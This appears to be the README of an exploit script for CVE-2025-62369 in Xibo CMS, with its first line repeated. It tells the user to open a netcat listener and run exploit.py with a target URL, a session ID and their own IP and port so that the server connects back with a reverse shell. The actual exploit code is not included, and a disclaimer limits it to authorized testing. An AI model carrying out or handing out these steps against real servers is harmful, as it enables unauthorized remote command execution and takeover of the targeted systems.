
This script exploits CVE-2025-62369 in Xibo CMS to execute a reverse shell command.
This script exploits CVE-2025-62369 in Xibo CMS to execute a reverse shell command.
nc -lvnp <PORT>
python3 exploit.py -u "http://<TARGET_IP>:<TARGET_PORT>" -s "<PHPSESSID>" -i <LOCAL_IP> -p <PORT>
<TARGET_IP>: Xibo CMS server IP<TARGET_PORT>: Xibo CMS server port<PHPSESSID>: Your PHP session ID<LOCAL_IP>: Your IP to receive the reverse shell<PORT>: Port for the reverse shell (must match your listener)Disclaimer:
This code is for educational and authorized testing purposes only.